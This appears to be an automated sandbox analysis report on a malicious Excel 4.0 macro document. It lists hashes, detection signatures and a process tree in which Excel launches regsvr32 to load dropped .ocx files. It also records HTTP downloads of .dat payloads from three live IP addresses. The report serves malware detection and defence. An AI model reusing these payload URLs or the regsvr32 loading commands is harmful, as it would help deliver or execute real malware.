Play interactive tour

Edit tour

Windows Analysis Report ClaimCopy-539408676-12022021.xlsb

Overview

General Information

Sample Name:	ClaimCopy-539408676-12022021.xlsb
Analysis ID:	532685
MD5:	4b4aacfd637f34a8c9111d80578bf275
SHA1:	86b477fdaa06a4fcd7e863af0b7dc9321b9978e4
SHA256:	04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Multi AV Scanner detection for submitted file

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Found protected and hidden Excel 4.0 Macro sheet

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 6996 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 5972 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6440 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6468 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6464 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6536 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 6516 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6996, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 5972

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: ClaimCopy-539408676-12022021.xlsb

Virustotal: Detection: 10%

Perma Link

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Source: global traffic

TCP traffic: 192.168.2.4:49763 -> 185.82.126.78:80

Source: global traffic

TCP traffic: 192.168.2.4:49763 -> 185.82.126.78:80

Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown	TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown	TCP traffic detected without corresponding DNS query: 185.82.126.78

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:18 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://158.69.133.78/939602286691.dat
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://158.69.133.78/939602286691.dat2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.126.78/939602286691.dat
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.126.78/939602286691.dat2
